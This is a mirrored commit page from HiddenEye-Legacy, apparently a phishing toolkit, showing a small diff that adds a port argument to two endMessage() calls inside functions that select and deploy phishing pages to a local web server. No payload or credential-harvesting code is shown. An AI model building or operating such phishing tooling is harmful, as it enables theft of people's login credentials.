mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Little Fix..
This commit is contained in:
parent
bbc1e67db5
commit
b534e580b1
|
@ -148,7 +148,7 @@ def runPhishing(page, customOption): # Phishing pages selection menu
|
|||
sleep(3)
|
||||
copy_tree('WebPages/CUSTOM(2)/', "Server/www/")
|
||||
else:
|
||||
endMessage()
|
||||
endMessage(port)
|
||||
|
||||
|
||||
def selectPort(): # Question where user must select port
|
||||
|
@ -812,7 +812,7 @@ ________________________________________________________________________________
|
|||
customOption = ''
|
||||
runPhishing('CUSTOM(2)', customOption)
|
||||
else:
|
||||
endMessage()
|
||||
endMessage(port)
|
||||
|
||||
|
||||
def loadModule(module): # This one just show text..
|
||||
|
|
Loading…
Reference in New Issue
Block a user